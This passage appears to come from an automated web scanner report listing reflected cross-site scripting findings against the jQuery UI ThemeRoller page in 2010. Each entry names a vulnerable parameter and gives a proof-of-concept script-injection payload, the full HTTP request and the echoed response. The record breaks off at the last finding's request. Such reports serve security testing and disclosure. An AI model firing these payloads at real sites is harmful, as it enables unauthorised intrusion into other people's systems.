The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74466"><script>alert(1)</script>e3901bf7849 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px74466"><script>alert(1)</script>e3901bf7849 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px74466"><script>alert(1)</script>e3901bf7849" type="text/css" media="all" />
...[SNIP]...

3.93. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce12a"><script>alert(1)</script>57ff54b00b6 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121ce12a"><script>alert(1)</script>57ff54b00b6&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121ce12a"><script>alert(1)</script>57ff54b00b6&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

3.94. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebeba"><script>alert(1)</script>9e316bab61c was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222ebeba"><script>alert(1)</script>9e316bab61c&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222ebeba"><script>alert(1)</script>9e316bab61c&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

3.95. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f85e"><script>alert(1)</script>5ce0760a9c0 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555559f85e"><script>alert(1)</script>5ce0760a9c0&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555559f85e"><script>alert(1)</script>5ce0760a9c0&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

3.96. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d65d0"><script>alert(1)</script>042902ea54a was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ad65d0"><script>alert(1)</script>042902ea54a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ad65d0"><script>alert(1)</script>042902ea54a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

3.97. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7f9"><script>alert(1)</script>680216dd329 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222fb7f9"><script>alert(1)</script>680216dd329&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222fb7f9"><script>alert(1)</script>680216dd329&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

3.98. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac58"><script>alert(1)</script>288ea6641f4 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=3636364ac58"><script>alert(1)</script>288ea6641f4&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=3636364ac58"><script>alert(1)</script>288ea6641f4&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

3.99. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1729"><script>alert(1)</script>d30e2b92665 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121e1729"><script>alert(1)</script>d30e2b92665&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121e1729"><script>alert(1)</script>d30e2b92665&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

3.100. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3133c"><script>alert(1)</script>1841d7744ed was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif3133c"><script>alert(1)</script>1841d7744ed&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif3133c"><script>alert(1)</script>1841d7744ed&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

3.101. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 988bb"><script>alert(1)</script>8a2c7460782 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em988bb"><script>alert(1)</script>8a2c7460782&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
